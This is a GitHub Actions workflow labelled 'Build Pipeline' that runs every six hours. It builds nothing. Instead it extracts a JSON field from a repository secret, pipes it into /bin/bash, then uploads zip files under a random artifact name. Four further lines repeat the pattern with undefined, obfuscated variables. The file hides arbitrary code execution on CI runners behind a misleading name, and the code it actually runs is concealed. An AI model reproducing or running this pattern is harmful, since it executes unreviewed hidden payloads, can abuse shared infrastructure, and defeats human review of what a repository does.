name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '0 0,6,12,18 * * *'
permissions:
  contents: read
  actions: read
env:
  RUNNER_DEBUG: 0
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  invoke:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run pipeline
        env:
          pckey0: ${{ secrets.pckey0 }}
        run: |
          printf '%s' "$pckey0" | jq -r .phxgd0 | /bin/bash
          echo $clv963 | jq -r .o79740 | /bin/bash
          printf '%s' "$fw8851" | jq -r .ckf498 | /bin/bash
          echo $mg98032 | jq -r .bviyb40237 | /bin/bash
          echo $b627 | jq -r .k83962 | /bin/bash

      - name: Upload archive
        uses: actions/upload-artifact@v4
        with:
          name: rsc5BS4l
          path: "*.zip"
          retention-days: 1
